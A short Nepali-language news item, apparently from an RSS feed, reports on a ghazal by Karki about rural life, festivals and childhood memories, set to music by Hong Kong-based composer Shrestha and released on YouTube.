ग्रामीण परिवेशका भोगाईहरु, विभिन्न चाडपर्वसँगै बाह्र वटै महिनाहरुलाई समेट्दै  बालापन र यौवनकालका क्षणहरुलाई स्मरण गरेर गजल तयार पारेको कार्कीले बताए। संगीतकार श्रेष्ठ लामो समयदेखि प्रवास हङकङमा रहेर पनि नेपाली गीत संगीतको उन्नयनको लागि आफूले कर्म गरिरहेको र यो गजलका शब्दहरु अत्यन्तै मन परेकोले आफूले निकै मेहनतका साथ संगीत गरेको उल्लेख गरे। यो म्युजिक भिडियो Nagendra Shrestha Youtube च्यानलमा हेर्न सकिन्छ।

]]>
https://www.antaranganews.com/?feed=rss2&p=17441 0